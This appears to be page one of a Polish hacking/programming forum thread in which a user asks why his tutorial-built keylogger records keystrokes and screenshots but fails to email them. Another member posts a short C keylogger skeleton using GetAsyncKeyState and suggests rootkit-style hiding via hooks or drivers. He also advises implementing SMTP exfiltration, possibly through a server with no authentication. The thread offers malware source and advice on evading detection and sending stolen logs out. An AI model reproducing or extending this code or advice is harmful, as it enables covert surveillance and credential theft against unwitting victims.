Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 16

Temat: Keylogger by zurawek

  1. #1
    Zarejestrowany
    Jun 2010
    Skąd
    Częstochowa
    Postów
    8

    Domyślnie Keylogger by zurawek

    Witam wszystkich :-)
    Znalazłem jakiś czas temu tutorial Zurawka, jak zrobić keyloggera robiącego ssy i wysyłającego je+logi na maila. >>Tutorial<<
    Zrobiłem wszystko tak jak w tutorialu było napisane, ale niestety nie wszystko działa. Keylogger odpala się, tworzy się plik z ciągiem wcisnietych klawiszy, screeny robią się, ale nie wysyła się to wszystko na maila. Ktoś może coś poradzić?
    Pisałem w Bilderze c++ builder 6 enterprize.
    Ostatnio edytowane przez galganov : 06-28-2010 - 11:54

  2. #2
    Zarejestrowany
    Sep 2006
    Postów
    1,227

    Domyślnie

    • Literówka,
    • zablokowany port 25 u klienta.


    Działa u ciebie? Debugowałeś? Sprawdziłeś, czy samo wysyłanie maila działa?

  3. #3
    Zarejestrowany
    Jun 2010
    Skąd
    Częstochowa
    Postów
    8

    Domyślnie

    Literówka

    Mogę podesłać kod?

    zablokowany port 25 u klienta

    na razie klientem jestem ja. jak mogę sprawdzić czy mam ten port zablokowany? (zwykly port forwarding routera czy jak?)

    Działa u ciebie?
    Właśnie keyloggera zrobiłem dzisiaj i na razie siedzi u mnie na kompie tylko.
    Debugowałeś?
    Nie wiem co to
    Sprawdziłeś, czy samo wysyłanie maila działa?
    Nie wiem jak. Mógłbyś mi doradzić jak to sprawdzić?

    dziękuję za wypowiedź




    EDIT://
    wyskakuje mi taki komunikat na pulpicie:
    Ostatnio edytowane przez galganov : 06-28-2010 - 11:50

  4. #4
    Zarejestrowany
    Dec 2009
    Postów
    164

    Domyślnie

    jakby nie było to nie wiem po co tutoriale
    keylogger można napisać za pomocą jednej funkcji, tj
    GetKeyState oraz GetAsyncKeyState
    które są doskonale udokumentowane na MSDN.


    Oto moja implementacja szkieletu examplowego keyloggera:
    Kod:
    // pseudo keylogger code wrote by g3t_d0wn //
    /////////////////////////////////////////////
    #include <stdio.h>
    #include <windows.h>
    
    int main(void) {
        FILE* txt;
        txt = fopen("keys.txt", "w");
        if (txt == NULL) return -1;
        
        int count = 0;
        while(1) {
           for(count = 48; count < 90; count ++) {
               if (GetAsyncKeyState(count) & 0x01 == 1) {
                  fputc((char)count, txt);
               }
           }
        }
        
        fclose(txt);
        return 0;
    }
    same banały , jest jeszcze wiele możliwości implementacji keyloggera jak zastawienie hooków, napisanie sterownika łapiącego klawisze(bardziej rootkitowo, aby ukryć keylogger ).

    //
    nie chcę już tutaj wytykać więcej błędów, bo jest ich u ciebie masa, ale jeśli zamierzasz pisać coś takiego w Borland życzę powodzenia.....
    Ostatnio edytowane przez g3t_d0wn : 06-28-2010 - 19:17

  5. #5
    Zarejestrowany
    Jun 2010
    Skąd
    Częstochowa
    Postów
    8

    Domyślnie

    nie wiem jak to skomentować
    rozpisałeś się - fajnie. ale po co?
    mam problem z wysyłaniem logów na mail a Ty chyba nie umiesz czytać, skoro piszesz nie ma temat

  6. #6
    Zarejestrowany
    Dec 2009
    Postów
    164

    Domyślnie

    nie pisałem tego na marne, mialem na mysli zebys zrezygnowal z tego tutoriala .

  7. #7
    Zarejestrowany
    Jun 2010
    Skąd
    Częstochowa
    Postów
    8

    Domyślnie

    "Keylogger odpala się, tworzy się plik z ciągiem wcisnietych klawiszy, screeny robią się, ale nie wysyła się to wszystko na maila. Ktoś może coś poradzić?"

  8. #8
    Zarejestrowany
    Dec 2009
    Postów
    164

    Domyślnie

    po co keylogger który będzie wykrywalny przez minimum 80% antywirusów
    skoro dalej jesteś za keyloggerem, zaimplementuj sobie samemu wysylanie maila, tutaj masz RFC która opisuje SMTP:

    RFC 2821 - Simple Mail Transfer Protocol

    tutaj wersja PL która nie opisuje wszystkiego, ale wystarczy ci ta wiedza do wysłania logów:
    Simple Mail Transfer Protocol

    // edit
    nie zapomnij się jeszcze zalogować na email z którego wysyłasz gdyż jest tam podany stary przykład dziurawego protokołu SMTP.
    Ostatnio edytowane przez g3t_d0wn : 06-29-2010 - 09:10

  9. #9
    Zarejestrowany
    Jun 2010
    Skąd
    Częstochowa
    Postów
    8

    Domyślnie

    a moglbys zassac zipa z tutorialu w pierwszym poscie i pokazac co jest zle z wysylaniem logow przez smtp? bo mi sie wydaje, ze nie chce sie logowac na maila po prostu.

    byłbym wdzieczny

  10. #10
    Zarejestrowany
    Dec 2009
    Postów
    164

    Domyślnie

    akurat nie bawię się w komponenty Borlanda bo jest mi to zbędne i traktuje to jako śmieci(bez obrazy).
    nie musisz się logować jeśli poszukasz serwera który nie potrzebuje autoryzacji SMTP.

Strona 1 z 2 12 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj